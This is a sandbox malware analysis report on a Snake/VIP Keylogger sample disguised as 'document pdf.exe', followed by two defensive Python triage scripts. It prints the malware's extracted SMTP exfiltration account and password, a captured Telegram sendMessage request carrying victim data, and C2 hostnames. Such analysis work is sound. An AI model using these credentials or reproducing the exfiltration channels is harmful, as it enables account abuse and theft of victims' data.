
Windows Analysis Report
document pdf.exe

Overview

General Information

Sample name: document pdf.exe
Analysis ID: 1584835
MD5: c67b6ff2d472bf82dc4da545dbc37a43
SHA1: c5e677e5e48d5ca965b6e2d3f0c8b56fb80e7be5
SHA256: df3c8cc4eaf6b0a8a6a0254c54160486df1b38f8a6591a60dbc520f38389c400
Tags: exe, SnakeKeylogger, user-James_inthe_box

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • document pdf.exe (PID: 3420 cmdline: "C:\Users\user\Desktop\document pdf.exe" MD5: C67B6FF2D472BF82DC4DA545DBC37A43)
    • document pdf.exe (PID: 2672 cmdline: "C:\Users\user\Desktop\document pdf.exe" MD5: C67B6FF2D472BF82DC4DA545DBC37A43)
    • WerFault.exe (PID: 3352 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 1340 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: (empty)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000003.00000002.4665157890.0000000002C63000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | matched strings:
  • 0x2de09:$a1: get_encryptedPassword
  • 0x2e126:$a2: get_encryptedUsername
  • 0x2dc19:$a3: get_timePasswordChanged
  • 0x2dd22:$a4: get_passwordField
  • 0x2de1f:$a5: set_encryptedPassword
  • 0x2f4ba:$a7: get_logins
  • 0x2f41d:$a10: KeyLoggerEventArgs
  • 0x2f082:$a11: KeyLoggerEventArgsEventHandler
Source | Rule | Description | Author | Strings
0.2.document pdf.exe.4431ca0.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.document pdf.exe.4431ca0.2.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
0.2.document pdf.exe.4431ca0.2.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
0.2.document pdf.exe.4431ca0.2.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | matched strings:
  • 0x2c209:$a1: get_encryptedPassword
  • 0x2c526:$a2: get_encryptedUsername
  • 0x2c019:$a3: get_timePasswordChanged
  • 0x2c122:$a4: get_passwordField
  • 0x2c21f:$a5: set_encryptedPassword
  • 0x2d8ba:$a7: get_logins
  • 0x2d81d:$a10: KeyLoggerEventArgs
  • 0x2d482:$a11: KeyLoggerEventArgsEventHandler
0.2.document pdf.exe.4431ca0.2.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth | matched strings:
  • 0x39f4e:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x395f1:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x3984e:$a4: \Orbitum\User Data\Default\Login Data
  • 0x3a22d:$a5: \Kometa\User Data\Default\Login Data

                System Summary

Source: Network Connection; Author: frack113; Data: DestinationIp: 208.91.199.225, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\document pdf.exe, Initiated: true, ProcessId: 2672, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49890
Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-01-06T16:01:13.092549+0100  2803305  3         Unknown Traffic          192.168.2.6  49750        188.114.96.3     443               TCP
2025-01-06T16:01:14.845558+0100  2803305  3         Unknown Traffic          192.168.2.6  49769        188.114.96.3     443               TCP
2025-01-06T16:01:16.236493+0100  2803305  3         Unknown Traffic          192.168.2.6  49778        188.114.96.3     443               TCP
2025-01-06T16:01:17.739768+0100  2803305  3         Unknown Traffic          192.168.2.6  49790        188.114.96.3     443               TCP
2025-01-06T16:01:22.185426+0100  2803305  3         Unknown Traffic          192.168.2.6  49825        188.114.96.3     443               TCP

Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-01-06T16:01:11.323685+0100  2803274  2         Potentially Bad Traffic  192.168.2.6  49731        132.226.8.169    80                TCP
2025-01-06T16:01:12.526830+0100  2803274  2         Potentially Bad Traffic  192.168.2.6  49731        132.226.8.169    80                TCP
2025-01-06T16:01:14.276805+0100  2803274  2         Potentially Bad Traffic  192.168.2.6  49756        132.226.8.169    80                TCP

Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-01-06T16:01:25.666289+0100  1810007  1         Potentially Bad Traffic  192.168.2.6  49847        149.154.167.220  443               TCP

                AV Detection

Source: 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source: 0.2.document pdf.exe.43ee280.1.unpack; Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
Source: document pdf.exe; Virustotal: Detection: 73%
Source: document pdf.exe; ReversingLabs: Detection: 65%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: document pdf.exe; Joe Sandbox ML: detected

                Location Tracking

Source: unknown; DNS query: name: reallyfreegeoip.org
Source: document pdf.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49744 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49847 version: TLS 1.2
Source: document pdf.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

Source: Network traffic; Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49847 -> 149.154.167.220:443
Source: unknown; DNS query: name: api.telegram.org
Source: Yara match; File source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE
Source: global traffic; TCP traffic: 192.168.2.6:49890 -> 208.91.199.225:587
Source: global traffic; TCP traffic: 192.168.2.6:51718 -> 162.159.36.2:53
Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic; HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:680718%0D%0ADate%20and%20Time:%2007/01/2025%20/%2000:14:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20680718%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 132.226.8.169
Source: Joe Sandbox View; IP Address: 149.154.167.220
Source: Joe Sandbox View; ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; DNS query: name: checkip.dyndns.org
Source: unknown; DNS query: name: reallyfreegeoip.org
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49756 -> 132.226.8.169:80
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49731 -> 132.226.8.169:80
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49769 -> 188.114.96.3:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49790 -> 188.114.96.3:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49750 -> 188.114.96.3:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49778 -> 188.114.96.3:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49825 -> 188.114.96.3:443
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49744 version: TLS 1.0
Source: unknown; TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic; DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic; DNS traffic detected: DNS query: api.telegram.org
Source: global traffic; DNS traffic detected: DNS query: us2.smtp.mailhostbox.com
Source: global traffic; DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Mon, 06 Jan 2025 15:01:25 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: document pdf.exe, 00000003.00000002.4665157890.0000000002C63000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://aborters.duckdns.org:8081
Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://anotherarmy.dns.army:8081
Source: document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://checkip.dyndns.org
Source: document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://checkip.dyndns.org/
Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://checkip.dyndns.org/q
Source: document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.6.dr; String found in binary or memory: http://upx.sf.net
Source: document pdf.exe, 00000003.00000002.4665157890.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002C63000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://varders.kozow.com:8081
Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org
Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot
Source: document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:680718%0D%0ADate%20a
Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: document pdf.exe, 00000003.00000002.4665157890.0000000002C07000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: document pdf.exe, 00000003.00000002.4665157890.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://chrome.google.com/webstore?hl=enh
Source: document pdf.exe, 00000003.00000002.4665157890.0000000002C02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: document pdf.exe, 00000003.00000002.4665157890.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002B31000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://reallyfreegeoip.org
Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: document pdf.exe, 00000003.00000002.4665157890.0000000002B31000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002AEB000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002B31000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/h
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
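The two Telegram Bot API strings and the reallyfreegeoip.org strings above are the most useful pivot points in this memory-string list: the first is the stealer's exfiltration template (the bot token between "/bot" and "/sendMessage" and the chat_id are both empty in the dumped string, so what was captured is the format template that gets filled in at runtime, and the URL-encoded text parameter is the start of the report body it sends), the second is the external-IP geolocation check. The script below is an added triage example, not part of the Joe Sandbox report or the sample; its input list is constructed from the strings shown above (the Telegram text is truncated exactly as the report truncates it) and the function names are my own. It decodes the sendMessage template into its report fields, pulls the looked-up IP out of the geoip URL while ignoring the trailing junk byte the dump carries, and tags the Chromium "Login Data" schema string as a browser-credential-theft indicator.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample: strings copied from the memory-string section of this
# report. Trailing characters such as "$" are dump artefacts, not URL content.
SAMPLE_STRINGS = [
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=",
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:680718%0D%0ADate%20a",
    "https://reallyfreegeoip.org",
    "https://reallyfreegeoip.org/xml/",
    "https://reallyfreegeoip.org/xml/8.46.123.189",
    "https://reallyfreegeoip.org/xml/8.46.123.189$",
    "https://chrome.google.com/webstore?hl=en",
    "CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL "
    "REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR "
    "NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));",
]

# Bot API path: /bot<token>/<method>. Only the two methods a keylogger uses
# to push text reports or log/screenshot files are treated as exfiltration.
TELEGRAM_PATH_RE = re.compile(r"^/bot([^/]*)/(sendMessage|sendDocument)$")
# Geolocation lookup of a specific IP; anything after the dotted quad is ignored.
GEOIP_RE = re.compile(r"^https://reallyfreegeoip\.org/xml/(\d{1,3}(?:\.\d{1,3}){3})")


def parse_telegram_exfil(url):
    """Return (bot_token, chat_id, decoded_text) for a Telegram Bot API
    sendMessage/sendDocument URL, or None if the URL is not one.
    Empty token and chat_id mean the string is the unfilled template."""
    parts = urlsplit(url)
    if parts.netloc != "api.telegram.org":
        return None
    m = TELEGRAM_PATH_RE.match(parts.path)
    if not m:
        return None
    # parse_qs percent-decodes the values, so %0D%0A becomes a real CRLF.
    q = parse_qs(parts.query, keep_blank_values=True)
    chat_id = q.get("chat_id", [""])[0]
    text = q.get("text", [""])[0]
    return m.group(1), chat_id, text


def report_fields(decoded_text):
    """Split the decoded report body into its non-empty CRLF-separated lines."""
    return [line.strip() for line in decoded_text.split("\r\n") if line.strip()]


def geoip_lookup_target(url):
    """Return the IP the sample asked reallyfreegeoip.org about, or None."""
    m = GEOIP_RE.match(url)
    return m.group(1) if m else None


def triage(strings):
    """Bucket dumped strings into the three indicator classes seen in this run."""
    hits = {"telegram": [], "geoip": [], "browser_schema": []}
    for s in strings:
        exfil = parse_telegram_exfil(s)
        if exfil is not None:
            hits["telegram"].append(exfil)
            continue
        ip = geoip_lookup_target(s)
        if ip:
            hits["geoip"].append(ip)
            continue
        # Chromium's Login Data schema embedded in a non-browser binary means
        # the binary carries its own reader for the browser password store.
        if s.startswith("CREATE TABLE") and "logins" in s:
            hits["browser_schema"].append(s.split("(")[0].strip())
    return hits


if __name__ == "__main__":
    for token, chat, text in triage(SAMPLE_STRINGS)["telegram"]:
        print(f"token={token!r} chat_id={chat!r} fields={report_fields(text)}")
    print(triage(SAMPLE_STRINGS)["geoip"], triage(SAMPLE_STRINGS)["browser_schema"])
```

Run against a real strings dump (for example the output of `strings` over the .sdmp files), a non-empty token in the first tuple element is the operator's bot token and can be reported to Telegram; the geoip hits give the external IP the sandbox exposed, which is what the sample compares against its country list.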
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown | Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown | Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown | Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49847 version: TLS 1.2
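The twenty "HTTP traffic on port" rows above are one notice per direction of each TCP/443 connection, so they describe ten TLS sessions, and only one of them (client port 49847) is attributed to a server address and TLS version in the "HTTPS traffic detected" row. The script below is an added example, not part of the report: it takes the flow rows as constructed input, pairs each ephemeral client port with its two directions, attaches the server attribution where the report gives one, and lists the sessions that still have to be resolved from the PCAP. The function names are my own.

```python
import re
from collections import defaultdict

# Constructed sample: the per-direction flow rows from the network section
# of this report, in the order the report lists them.
FLOW_LINES = [
    "HTTP traffic on port 443 -> 49744", "HTTP traffic on port 49841 -> 443",
    "HTTP traffic on port 443 -> 49841", "HTTP traffic on port 49813 -> 443",
    "HTTP traffic on port 443 -> 49750", "HTTP traffic on port 443 -> 49790",
    "HTTP traffic on port 49769 -> 443", "HTTP traffic on port 49744 -> 443",
    "HTTP traffic on port 49801 -> 443", "HTTP traffic on port 49825 -> 443",
    "HTTP traffic on port 49750 -> 443", "HTTP traffic on port 49847 -> 443",
    "HTTP traffic on port 49778 -> 443", "HTTP traffic on port 443 -> 49825",
    "HTTP traffic on port 443 -> 49847", "HTTP traffic on port 443 -> 49769",
    "HTTP traffic on port 443 -> 49813", "HTTP traffic on port 49790 -> 443",
    "HTTP traffic on port 443 -> 49801", "HTTP traffic on port 443 -> 49778",
]
# The single attributed session from the "HTTPS traffic detected" row.
TLS_LINES = ["149.154.167.220:443 -> 192.168.2.6:49847 version: TLS 1.2"]

FLOW_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
TLS_RE = re.compile(r"(\S+):(\d+) -> (\S+):(\d+) version: (.+)$")


def pair_sessions(flow_lines, server_port=443):
    """Map each client ephemeral port to the set of directions observed.
    A row 'X -> 443' is the outbound half, '443 -> X' the inbound half."""
    seen = defaultdict(set)
    for line in flow_lines:
        m = FLOW_RE.search(line)
        if not m:
            continue
        src, dst = int(m.group(1)), int(m.group(2))
        if dst == server_port:
            seen[src].add("out")
        elif src == server_port:
            seen[dst].add("in")
    return dict(seen)


def attribute_servers(sessions, tls_lines):
    """Attach server endpoint and TLS version to sessions the report named."""
    result = {port: {"complete": dirs == {"in", "out"}, "server": None, "tls": None}
              for port, dirs in sessions.items()}
    for line in tls_lines:
        m = TLS_RE.search(line)
        if not m:
            continue
        srv_ip, srv_port, _cli_ip, cli_port, version = m.groups()
        port = int(cli_port)
        if port in result:
            result[port]["server"] = f"{srv_ip}:{srv_port}"
            result[port]["tls"] = version
    return result


def summarize(flow_lines, tls_lines):
    """Collapse the flow rows into a per-session view for the analyst."""
    s = attribute_servers(pair_sessions(flow_lines), tls_lines)
    return {
        "sessions": sorted(s),
        "complete": sorted(p for p, v in s.items() if v["complete"]),
        "attributed": {p: (v["server"], v["tls"]) for p, v in s.items() if v["server"]},
        "unattributed": sorted(p for p, v in s.items() if v["server"] is None),
    }


if __name__ == "__main__":
    for key, value in summarize(FLOW_LINES, TLS_LINES).items():
        print(f"{key}: {value}")
```

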